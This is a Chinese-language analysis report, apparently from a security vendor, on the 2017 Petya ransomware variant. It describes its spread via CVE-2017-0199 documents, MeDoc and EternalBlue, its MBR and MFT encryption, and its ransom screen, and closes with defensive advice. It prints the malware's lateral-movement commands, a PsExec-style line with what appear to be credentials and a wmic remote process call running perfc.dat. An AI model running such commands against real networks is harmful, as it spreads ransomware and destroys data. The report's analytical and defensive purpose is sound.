Petya勒索软件新变种详细分析报告

小龙信息安全 7年前

2.91W 0

Petya新变种简介

据twitter爆料，乌克兰政府机构遭大规模攻击，其中乌克兰副总理的电脑均遭受攻击，目前腾讯电脑管家已经确认该病毒为Petya勒索病毒变种。Petya勒索病毒变种中毒后会扫描内网的机器，通过永恒之蓝漏洞自传播到内网的机器，达到快速传播的目的。

有国外安全研究人员认为，Petya勒索病毒变种会通过邮箱附件传播，利用携带漏洞的DOC文档进行攻击。中毒后，病毒会修改系统的MBR引导扇区，当电脑重启时，病毒代码会在Windows操作系统之前接管电脑，执行加密等恶意操作。电脑重启后，会显示一个伪装的界面，此界面实际上是病毒显示的，界面上假称正在进行磁盘扫描，实际上正在对磁盘数据进行加密操作。

Petya勒索软件新变种详细分析报告

当加密完成后，病毒要求受害者支付价值300美元的比特币之后，才会回复解密密钥。

Petya勒索软件新变种详细分析报告

传播渠道分析

可能传播渠道-邮箱传播

根据乌克兰CERT官方消息，邮件附件被认为该次病毒攻击的传播源头，邮箱附件是一个DOC文档，文档通过漏洞CVE-2017-0199来触发攻击，电脑管家也溯源到了国内类似邮件攻击最早发生在6月27日早上。在实际测试过程中，并没有完整重现整个攻击过程。

Petya勒索软件新变种详细分析报告

可能传播渠道-MeDoc

很多安全研究机构认为，这次Petya的攻击源是由于MeDoc软件的更新服务被劫持导致。

详细功能分析

感染过程分析

1，写MBR

Petya勒索软件新变种详细分析报告

0~0×21扇区保存的是病毒的MBR和微内核代码数据，而原始的MBR被加密保存在第0×22扇区。

2，加密文件

1）遍历分区

Petya勒索软件新变种详细分析报告

2）要加密的文件类型

Petya勒索软件新变种详细分析报告

3）文件加密过程

Petya勒索软件新变种详细分析报告

3、传播方式

1）可能通过管理共享在局域网内传播，而后通过wmic来实现远程命令执行。

C:\Windows\dllhost.dat \\10.141.2.26 -accepteula -s -d C:\Windows\System32\rundll32.exe “C:\Windows\perfc.dat”,##1 60 “RCAD\ryngarus.ext:FimMe21Pass!roy4″”RCAD\svcomactions:3GfmGeif”

Petya勒索软件新变种详细分析报告

c:\windows\system32\wbem\wmic.exe /node:”IP_ADDR” /user:”User” /password:”PWD” process call create “c:\windows\system32\rundll32.exe” \”c:\windows\perfc.dat\” #1

Petya勒索软件新变种详细分析报告

2）通过EternalBlue和EternalRomance漏洞传播。

Petya勒索软件新变种详细分析报告

程序发动攻击前，先尝试获取到可攻击的IP地址列表：

Petya勒索软件新变种详细分析报告

依次获取：已建立TCP连接的IP、本地ARP缓存的IP以及局域网内存在的服务器IP地址。收集完这些地址后，便进行进一步攻击。

磁盘加密和勒索细节

主要功能描述：

1、系统重启，恶意MBR加载；

2、检测磁盘是否被加密，如果没有则显示伪造的检测磁盘界面、并加密MFT；

3、显示红色的勒索界面，让用户输入秘钥；

细节分析：

MBR启动后，将1-21扇区数据复制到8000地址处，然后Jmp执行8000地址代码

Petya勒索软件新变种详细分析报告

通过读取标记位判断磁盘已经被加密

Petya勒索软件新变种详细分析报告

若磁盘没有加密，则显示伪造的检测磁盘界面，并加密MFT

Petya勒索软件新变种详细分析报告

加密完成后，读取扇区后面的勒索语句

Petya勒索软件新变种详细分析报告

将获取到的语句显示到屏幕上

图片17.png

从屏幕获取秘钥并验证

Petya勒索软件新变种详细分析报告

安全建议

1，及时下载安装腾讯电脑管家，并使用勒索病毒免疫工具，防患于未然。（免疫工具下载地址http://dlied6.qq.com/invc/xfspeed/qqpcmgr/download/PetyaFix_2_0_766_127.exe ）

2，及时使用电脑管家将补丁打全。

3，遇到可疑文件，特别是陌生邮件中的附件，不要轻易打开，首先使用电脑管家进行扫描，或上传至哈勃分析系统（https://habo.qq.com/）对文件进行安全性检测。